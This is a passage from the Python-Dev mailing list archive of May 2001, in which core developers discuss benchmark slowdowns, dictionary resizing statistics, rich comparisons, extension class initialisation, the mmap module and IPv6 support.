> the second time).  This is true across dozens of trials over several months,
> and across all versions of Python.

On Linux the situation is somewhat different; still I'm executing
the tests 10-times each and for the figures I posted, I even
ran pybench twice and only took the second readings as basis.
 
> And simple little loops routinely vary in reported runtime by a factor of 3.
> I may have to dig my old Win95 box out of the packing crate <0.6 wink>.
> 
> None of that changes, of course, that the numbers you got are scary.

Sure are... but I'm not so much interested in the absolute
numbers -- it's the hot-spots which showed up that scare me:
e.g. dictionary creation seems to have suffered along the way
for some reason, functions calls are even slower now than they
were previously and other important tasks such a instance
creation take a similar hit (probably as a result of the other
two).

Running the same test for 2.1 vs. 2.0 there's not much to
notice, so the important changes seem to be originating in
the move from 1.5.2 to 2.0.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james@daa.com.au  Thu May 17 08:33:17 2001
From: james@daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:33:17 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <Pine.LNX.4.33.0105171522400.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001, Fredrik Lundh wrote:

> footnote: this is usually done in the module init function, *before*
> the call to Py_InitModule.  see:

The PyExtensionClass_Export() function requires a pointer to the module
dictionary so that it can add itself to the module.  Unfortunately this
requires that Py_InitModule to have been called before hand.

I guess this means that the current ExtensionClass API will need to be
modified in order to allow ExtensionClasses to be initialised before
Py_InitModule.

>
>     http://www.python.org/doc/FAQ.html#3.24
>
> if the garbage collector can run after Python calls a module's init-
> function, but before that module calls back into Python, anything
> can happen...

James.


From mwh@python.net  Thu May 17 08:43:38 2001
From: mwh@python.net (Michael Hudson)
Date: 17 May 2001 08:43:38 +0100
Subject: [Python-Dev] Performance compares
In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200"
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com>
Message-ID: <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> Sure are... but I'm not so much interested in the absolute numbers
> -- it's the hot-spots which showed up that scare me: e.g. dictionary
> creation seems to have suffered along the way for some reason,
> functions calls are even slower now than they were previously and
> other important tasks such a instance creation take a similar hit
> (probably as a result of the other two).

Have you tried fiddling with gc parameters?  If the GC does a multi
generation trawl through the heap in the middle of some test, that
might skew the numbers in unexpected ways.

Or not, of course.

Cheers,
M.

-- 
  CLiki pages can be edited by anybody at any time. Imagine the most
  fearsomely comprehensive legal disclaimer you have ever seen, and
  double it                        -- http://ww.telent.net/cliki/index


From mal@lemburg.com  Thu May 17 10:03:06 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:03:06 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B0393CA.7B0E024C@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com> writes:
> 
> > Sure are... but I'm not so much interested in the absolute numbers
> > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > creation seems to have suffered along the way for some reason,
> > functions calls are even slower now than they were previously and
> > other important tasks such a instance creation take a similar hit
> > (probably as a result of the other two).
> 
> Have you tried fiddling with gc parameters?  If the GC does a multi
> generation trawl through the heap in the middle of some test, that
> might skew the numbers in unexpected ways.
> 
> Or not, of course.

No, I haven't tried fiddling with those. I'm not sure I want
to either ;-) ... the reason is that applications won't switch
off GC for execution and so the tests is closer to real life.

Still, I'll rerun the test suite using gc.disable() and post the 
results.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Thu May 17 10:18:36 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:18:36 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk> <3B0393CA.7B0E024C@lemburg.com>
Message-ID: <3B03976C.CF47961@lemburg.com>

"M.-A. Lemburg" wrote:
> 
> Michael Hudson wrote:
> >
> > "M.-A. Lemburg" <mal@lemburg.com> writes:
> >
> > > Sure are... but I'm not so much interested in the absolute numbers
> > > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > > creation seems to have suffered along the way for some reason,
> > > functions calls are even slower now than they were previously and
> > > other important tasks such a instance creation take a similar hit
> > > (probably as a result of the other two).
> >
> > Have you tried fiddling with gc parameters?  If the GC does a multi
> > generation trawl through the heap in the middle of some test, that
> > might skew the numbers in unexpected ways.
> >
> > Or not, of course.
> 
> No, I haven't tried fiddling with those. I'm not sure I want
> to either ;-) ... the reason is that applications won't switch
> off GC for execution and so the tests is closer to real life.
> 
> Still, I'll rerun the test suite using gc.disable() and post the
> results.

Turns out, the difference is not noticable (< 1%).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gmcm@hypernet.com  Thu May 17 14:00:27 2001
From: gmcm@hypernet.com (Gordon McMillan)
Date: Thu, 17 May 2001 09:00:27 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B03932B.8219.CCBF9F3F@localhost>

[Skip] 

> Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> It would normally be the address of a type object (e.g.
> &PyType_Type).  However, Jim Fulton pointed out that on Windows
> you can't get the address of &PyType_Type object at compile time.

This is MS being passive-aggressive. If you tell MSVC the 
source is C++, it will magically find the address of 
PyType_Type at compile time, but their language lawyers 
apparently  believe the C spec disallows this. Standards 
conformant and incompatible -

what-MS-calls-"win-win"-ly y'rs

- Gordon


From guido@digicool.com  Thu May 17 15:04:59 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 09:04:59 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200."
 <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
 <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

I have always thought that eventually (but long before Py3K!) all
objects would only support rich comparisons and the __cmp__ and
tp_compare slots would become completely obsolete.  I realize I
probably haven't expressed this thought clearly, and I'm not going to
push for this to happen quickly or forecefully, but it's nevertheless
how I see things.  I expect it would allow a tremendous cleanup of the
comparison code.  It will never reach the simplicity of cmp() -- but
think of Einstein's (?) rule "things should be as simple as they can
be, but no simpler."  Clearly cmp() was too simple. :-)

Anyway, it worries me whenever I hear someone express the thought that
adding rich comparisons to a particular object type would be a bad
idea because it would slow things down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Thu May 17 15:37:30 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:37:30 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT."
 <3B03932B.8219.CCBF9F3F@localhost>
References: <3B03932B.8219.CCBF9F3F@localhost>
Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com>

> [Skip] 
> 
> > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> > It would normally be the address of a type object (e.g.
> > &PyType_Type).  However, Jim Fulton pointed out that on Windows
> > you can't get the address of &PyType_Type object at compile time.
> 
> This is MS being passive-aggressive. If you tell MSVC the 
> source is C++, it will magically find the address of 
> PyType_Type at compile time, but their language lawyers 
> apparently  believe the C spec disallows this. Standards 
> conformant and incompatible -
> 
> what-MS-calls-"win-win"-ly y'rs
> 
> - Gordon

I don't think MS blames it on the language spec so much; it's probably
more that they use the spec as an excuse not to fix their
implementation.  The problem only occurs when the definition of the
symbol is in a different DLL than the reference.  This is why built-in
types like PyTuple_Type don't have this problem.  I guess for C++ they
have to do a dynamic initializer anyway, so they can make this work,
but they haven't bothered to make it work for C.

My other point is that Skip's problem is clearly a gtk bug: it
shouldn't have exposed the type before fully initializing it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From james@daa.com.au  Thu May 17 15:48:43 2001
From: james@daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 22:48:43 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com>
Message-ID: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>

On Thu, 17 May 2001, Guido van Rossum wrote:

> My other point is that Skip's problem is clearly a gtk bug: it
> shouldn't have exposed the type before fully initializing it.

On further investigation, it turned out that it was caused by a bug in my
code generator that caused one extension class to be initialised before
its base class (in fact, that particular extension class shouldn't have
had any base classes).  It was just the cyclic GC code triggering the bug.

It will be fixed in the next snapshot of pygtk for GTK+ 2.0

James.

-- 
Email: james@daa.com.au
WWW:   http://www.daa.com.au/~james/


From guido@digicool.com  Thu May 17 15:52:54 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:52:54 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800."
 <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com>

> On further investigation, it turned out that it was caused by a bug in my
> code generator that caused one extension class to be initialised before
> its base class (in fact, that particular extension class shouldn't have
> had any base classes).  It was just the cyclic GC code triggering the bug.
> 
> It will be fixed in the next snapshot of pygtk for GTK+ 2.0

Excellent news, James!  I love the open source process!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@digicool.com  Thu May 17 16:04:50 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 17 May 2001 11:04:50 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
 <200105171452.f4HEqse09691@odiug.digicool.com>
Message-ID: <15107.59538.421007.37251@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

    GvR> Excellent news, James!  I love the open source process!

No kidding!

http://perens.com/Articles/StandTogether.html

:)


From Barrett@stsci.edu  Thu May 17 15:56:49 2001
From: Barrett@stsci.edu (Paul Barrett)
Date: Thu, 17 May 2001 10:56:49 -0400
Subject: [Python-Dev] mmap module
Message-ID: <3B03E6B1.A19F6594@STScI.Edu>

In the CVS log of the mmapmodule.c, Tim Peters says:

"The code really needs to be rethought from scratch (not by me, though
...)."

Well, I might be the person to do the rethinking, but I'd first like
to know what Tim has in mind.  I've been playing around with this
module lately and tend to agree that some enhancements could be made,
particularly to prevent "bus errors" and "segmentation faults".  The
ability to have offsets into a file that are not multiples of the
system pagesize would also be nice.

I'd be willing to submit a PEP on a new mmapmodule, once I know what
others would like.

 -- Paul

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From tim.one@home.com  Thu May 17 17:02:38 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 17 May 2001 12:02:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.  I realize I
> probably haven't expressed this thought clearly, and I'm not going to
> push for this to happen quickly or forecefully, but it's nevertheless
> how I see things.  I expect it would allow a tremendous cleanup of the
> comparison code.  It will never reach the simplicity of cmp() -- but
> think of Einstein's (?) rule "things should be as simple as they can
> be, but no simpler."  Clearly cmp() was too simple. :-)
>
> Anyway, it worries me whenever I hear someone express the thought that
> adding rich comparisons to a particular object type would be a bad
> idea because it would slow things down.

At the moment, "almost all" comparisons in the dynamic sense have no need of
richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple
<wink>.  For now richcmps are a tail-wagging-the-dog phenomenon, or more like
the tail growing 10 pounds of dense matted hair, making the once-frisky puppy
slow to a crawl because its butt is scraping the ground <wink>.

Martin and I can resolve our differences wrt strings via getting rid of old
strcmp entirely.  Do you like the implications?

1. Code using cmp(string1, string2) will clearly run significantly
   slower, calling string comparison 1 (when == obtains), 2 (when <
   obtains), or 3 (when > obtains) times instead of always once only.
   Since == is the least likely outcome when using cmp() on strings
   (you can conclude that by instrumenting Python, or by common
   sense <0.5 wink>), the number of string compare calls more than
   doubles in practice for string cmp()-slinging programs (which
   includes existing well-written tree-based lookup schemes).

2. String dictionary lookup will, unlike the general non-dict case
   Martin instrumented, never pass the new "are the pointers the
   same?" richcmp Py_EQ test (because dict lookup already makes that
   test inline).  So if old strcmp goes away, dict lookups that
   have to resort to strcmp will start paying for hopeless tests.
   OTOH, the "pointers equal?" test looks of dubious value for the
   non-dict string case anyway (where it succeeded only 1 in 20
   times).

#2 is a special case that can be special-cased to death, but #1 likely
applies to code using cmp() for comparisons of objects of any type, and
that's the primary reason I've resisted adding richcmps to the
heavily-compared types (variously string, int, float, long, and type
objects).  Also the case that adding "a fast path" shouldn't have to endure
wading thru multiple gimmicks (kinda defeats the idea of "fast" <wink>), so
the instant *one* heavily-compared basic type grows a richcmp (there are 0
such today), all should.

So that's what I'll aim at.


From guido@digicool.com  Thu May 17 19:18:27 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 14:18:27 -0400
Subject: [Python-Dev] IPv6
Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com>

What's out IPv6 story?  I recall that someone once sent me patches,
but they didn't work for me.  Is it time to try again?  In certain
circles IPv6 support in Python would be enough to switch programming
languages... :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@loewis.home.cs.tu-berlin.de  Thu May 17 20:45:29 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 21:45:29 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>

> 1. Code using cmp(string1, string2) will clearly run significantly
>    slower, calling string comparison 1 (when == obtains), 2 (when <
>    obtains), or 3 (when > obtains) times instead of always once only.

I'd like to question the rationale behind this procedure. If a type
has both tp_compare and tp_richcompare, and the application is
performing cmp(o1, o2): Why is it then a good thing to emulate 3way
compare using rich compare?

I just changed the order in do_cmp, to the IMO more correct 

	if (v->ob_type == w->ob_type
	    && (f = v->ob_type->tp_compare) != NULL)
		return (*f)(v, w);
	c = try_rich_to_3way_compare(v, w);
	if (c < 2)
		return c;
	c = try_3way_compare(v, w);
	if (c < 2)
		return c;
	return default_3way_compare(v, w);

With that, I got only a single failure in the test suite:
test_userlist fails with

exceptions.RuntimeError: UserList.__cmp__() is obsolete

Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I
agree.

According to the CVS log, this implementation of do_cmp was installed
in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
rationale for doing do_cmp in that order?

Regards,
Martin


From tim@digicool.com  Thu May 17 23:55:19 2001
From: tim@digicool.com (Tim Peters)
Date: Thu, 17 May 2001 18:55:19 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>

The worst percentage hit in both MAL's and Jeremy's pybench run was (here
showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's <wink>):

        DictCreation:      87.80 ms    2.93 us  +115.72%

Assorted things do not account for it:  the new overhead of linking and
unlinking dicts into the gc list (at creation and destruction times) seems
to account for no more than 2%; and the overhead due to using the slower
lookdict (as opposed to lookdict_string) even less.

Jeremy cheated by running a profiler:  the true cause is that dictresize
gets called about twice as often.

Before 2.1:  *before* inserting an item, we checked to see whether the dict
was at the resize point.  If so, we resized it.  Note that this meant
PyDict_SetItem could grow a dict even if no new entry was made (and that
this was the cause of several excruciating bugs in the 2.1 release cycle,
since it meant a dict could get reshuffled merely when replacing the values
associated with existing keys).

2.1:  *after* inserting an item, and if the key was new (i.e., the dict grew
a new entry, as opposed to just replacing the value associated with an
existing key), and the dict is at the resize point, we resize it.

Now the DictCreation test overwhelmingly creates dicts of size exactly 3.
The dict resizes from empty to capacity 4 on the way to gaining 2 entries.
When adding the third:

Before 2.1:  2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up
remaining a capacity-4 dict with 3 slots full.  This actually violates a
documented dict invariant (i.e., that dicts are never more than 2/3rd full).

2.1:  The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we
*do* resize it, and the dict ends up with 3 of 8 slots full.

I've got no interest in trying to restore the old behavior.  A compromise
may be to boost the minimum size of a non-empty dict from 4 to 8.  As is,
the only non-empty dicts that can get away with using the current minimum
size of 4 have no more than 2 elements.  The question is whether such tiny
non-empty dicts are common enough to make everyone else pay for "an extra"
resize.

go-ahead-just-*try*-to-prove-your-answer<wink>-ly y'rs  - tim


From skip@pobox.com (Skip Montanaro)  Fri May 18 00:21:50 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 17 May 2001 18:21:50 -0500
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <15108.23822.538016.564151@beluga.mojam.com>

    Guido> In certain circles IPv6 support in Python would be enough to
    Guido> switch programming languages... :-)

Sounds like someone has caught the scent of world domination... ;-)

S


From jeremy@digicool.com  Thu May 17 19:39:07 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 14:39:07 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.6859.810306.811326@slothrop.digicool.com>

Another option is to change the benchmark to put one more item in the
dict.  Then the same number of resizes would occur with both versions
of Python.

Jeremy


From tim.one@home.com  Fri May 18 01:08:13 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 17 May 2001 20:08:13 -0400
Subject: [Python-Dev] mmap module
In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>

[Paul Barrett]
> In the CVS log of the mmapmodule.c, Tim Peters says:
>
> "The code really needs to be rethought from scratch (not by me, though
> ...)."

That was in specific reference to the code I changed, in mmap_find_method.
The difficulty is that mmap is great for "large files", but the code before
my change used a C int for the starting offset and also for the return value;
I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but
doesn't help 64-bit Windows at all (where a C long remains 4 bytes).  The
mmap_object struct uses size_t to declare the relevant members, which is
possibly better still than C long, but may still leave platform capabilities
out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit
offsets when creating a mapped file view).  C is a friggin' mess here, and
Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range
of C integral types anyway.  In other words, if this code is ever to reach
its full potential, it "really needs to be rethought from scratch".

> Well, I might be the person to do the rethinking, but I'd first like
> to know what Tim has in mind.

Nothing that you did <wink>.

> I've been playing around with this module lately and tend to agree
> that some enhancements could be made, particularly to prevent "bus
> errors" and "segmentation faults".

When you get one of those, it's a bug in Python!

> The ability to have offsets into a file that are not multiples of the
> system pagesize would also be nice.

It's OS-specific.  Python should grow warts to protect against it on the OSes
that care.

> I'd be willing to submit a PEP on a new mmapmodule, once I know what
> others would like.

Hard to say.  This has the potential to become Python's next thread
subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
you do write a PEP, I vote to say that we'll cover Windows and Linux (and
maybe Mac OS X?) out of the box, but any other platform is at your own risk
(it doesn't really help if somebody pops up volunteering to support a
minority platform, because they eventually go away, their code stops working,
and it never gets fixed -- so it's use-at-your-own-risk in reality
regardless).


From tim.one@home.com  Fri May 18 01:29:18 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 17 May 2001 20:29:18 -0400
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKKCAA.tim.one@home.com>

[Guido van Rossum]
> What's out IPv6 story?

Ah!  If that's version 6 of the Integer-Point alternative to Floating-Point,
I've got it covered.  Otherwise my guess is we have no story at all.

> I recall that someone once sent me patches, but they didn't work for me.

Try recompiling with -DLONG_BIT=33.

> Is it time to try again?  In certain circles IPv6 support in Python
> would be enough to switch programming languages... :-)

Floating-point is *that* bad?!

ever-helpful-ly y'rs  - tim


From jeremy@digicool.com  Thu May 17 23:16:15 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 18:16:15 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.19887.534514.864376@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim@digicool.com> writes:

  TP> I've got no interest in trying to restore the old behavior.  A
  TP> compromise may be to boost the minimum size of a non-empty dict
  TP> from 4 to 8.  As is, the only non-empty dicts that can get away
  TP> with using the current minimum size of 4 have no more than 2
  TP> elements.  The question is whether such tiny non-empty dicts are
  TP> common enough to make everyone else pay for "an extra" resize.

I also did a profile run on CreateInstances, which has a difference of
+55.54% on my machine.  It's basically the same story.  The instance
dictionary is getting resized more often with Python 2.1+ than it did
with Python 1.5.2.  I wouldn't be surprised if several more tests are
showing a slowdown with the same cause.

So boosting the minimum size sounds like a good thing.

Jeremy


From tim.one@home.com  Fri May 18 04:26:52 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 17 May 2001 23:26:52 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOOKCAA.tim.one@home.com>

[/F]
> more info here:
>
> http://home.rica.net/alphae/419coal/index.htm
>
>     "A Five Billion US$ (as of 1996, much more now) worldwide
>     Scam which has run since the early 1980's under Successive
>     Governments of Nigeria.
>
>     "The Nigerian Scam is, according to published reports, the
>     Third to Fifth largest industry in Nigeria."

Most interesting to me is that US Post Office is upset about this:

    http://www.usps.gov/websites/depart/inspect/pressrel.htm

They don't seem to care so much that people are getting scammed, but that the
letters mailed from Nigeria to advance the fee-extorting phase of the scam
often use counterfeit postage!  Where else but here

    http://www.usps.gov/websites/depart/inspect/metercap.htm

could you learn that "Postage meters are not used in Nigeria -� therefore,
all postage meter impressions on Nigerian mail are counterfeit!"?

governments-are-mostly-insane-ly y'rs  - tim


From martin@loewis.home.cs.tu-berlin.de  Fri May 18 05:45:21 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 18 May 2001 06:45:21 +0200
Subject: [Python-Dev] IPv6
References: <oqbsosgh94.fsf@lin2.sram.qc.ca>
Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de>

> What's out IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

It's still on SF,

http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470

There are two problems with that patch, AFAICT:

1. It is too large for any individual to review in one chunk.
2. It gets quickly outdated.
3. It touches core aspects of the socket handling that are IMO better
   untouched. I don't know whether the generalization proposed there
   is necessary to support IPv6 reasonably - the author certainly feels
   it is.

To integrate the patch, I would propose to split it into smaller
parts, and submit and review them one-by-one. The first patch should
deal only with autoconf stuff, so that the proper #defines are in
config.h (although they would not be used right away). The second
patch should be a tar file of all new files (the patch on SF actually
misses some files). The third patch should include changes to the C
modules, and the last one changes to the standard library modules.

For that procedure to work, we need cooperation from the
submitter. For that, we probably need to indicate that we are really
interested in his work, and will work with him to integrate it into
Python. So far, his impression must be that nobody is interested - the
patch is sitting there since 2000-08-16, making it the oldes open
patch.

Undoubtedly, integrating this piece of work will result in various
problems with Python CVS: it won't build anymore on "funny machines"
(like Windows), and it might even crash on code that used to work just
fine. This prediction is not based on the actual content of the patch,
merely on its size, and the fact that IPv6 support is experimental on
many systems. So we'ld also need a BDFL pronouncement that we really
really want this, and that anybody running into problems should either
help fixing them, or stay away from CVS while it is being integrated.

Regards,
Martin


From tim@digicool.com  Fri May 18 08:17:07 2001
From: tim@digicool.com (Tim Peters)
Date: Fri, 18 May 2001 03:17:07 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>

[Jeremy]
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
>
> So boosting the minimum size sounds like a good thing.

I don't know.  PyBench is great for showing that *something* changed, but
it's got even less claim to "typical use" than pystone.

I don't know that the test suite is better in that respect, but it's got much
more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
record the ma_fill of each dict on its way to the grave (ma_fill == number of
non-virgin slots).  Across the test suite, here's the ranking, from most to
least popular fill:

  count    fill %total  cumulative %
 ------    ---- ------  ------------
 146321       1  53.30  53.30
  38200       0  13.91  67.21
  32616       2  11.88  79.09
  29648       3  10.80  89.89
   9884       5   3.60  93.49
   5423       4   1.98  95.47
   2428       6   0.88  96.35
   2016       8   0.73  97.08
   1179       7   0.43  97.51
    904       9   0.33  97.84
    709     103   0.26  98.10
    554      10   0.20  98.30
    513      13   0.19  98.49
    459      12   0.17  98.66
    447      11   0.16  98.82
    364      14   0.13  98.95
    233      15   0.08  99.04
    231      16   0.08  99.12
    193      18   0.07  99.19
    180      17   0.07  99.26
    122      19   0.04  99.30
    107      30   0.04  99.34
    105      21   0.04  99.38
     93      22   0.03  99.41
     93      20   0.03  99.45
     86     256   0.03  99.48
     82      23   0.03  99.51
     80      26   0.03  99.54
     74      24   0.03  99.56
     69      27   0.03  99.59
     64      25   0.02  99.61
     60      29   0.02  99.63
     49      28   0.02  99.65
     44      34   0.02  99.67
     33      32   0.01  99.68
     28      31   0.01  99.69
     27      37   0.01  99.70
     27      33   0.01  99.71
     26      35   0.01  99.72
     24      36   0.01  99.73
     23      39   0.01  99.74
     23      38   0.01  99.75
     21     128   0.01  99.75
     19      44   0.01  99.76
     19      40   0.01  99.77
     17      46   0.01  99.77
     16      48   0.01  99.78
     15      47   0.01  99.78
     14      50   0.01  99.79
     14      42   0.01  99.79

There are many more sizes, but I cut off the display here when they got too
rare to round to 1% of 1% of the total count.

Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
away with at most one resize (a dict of size 8 is enough for a fill of 5, but
not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
alive *at the same time*, it would be quite a waste of space to force the
non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
things like building one- or two-element keyword argument dicts, their
lifetimes rarely overlap.

A more aggressive idea is to allow denser dicts, by allowing them to become
no more than 75% full.  That is, change the resize test from

    mp->ma_fill*3 >= mp->ma_size*2

to

    mp->ma_fill*4 > mp->ma_size*3

That would allow the 10.8% of real(er) life dicts with fill 3 to continue
living in dicts with 4 slots, and allow about 90% of all dicts to get away
with no more than one resize.  The downside is that boosting the max load
factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
a small boost in the expected # of compares.  But the "theory" is for random
hash functions with "uniform probing" (tech term that does *not* mean linear
probing), and Python's hash functions often aren't random at all, while AFAIK
no rigorous analysis of its probing strategy exists.

So, plenty of arbitrary data there upon which to flip a coin <wink>.


From mal@lemburg.com  Fri May 18 08:26:36 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 09:26:36 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <3B04CEAC.57251CD7@lemburg.com>

Jeremy Hylton wrote:
> 
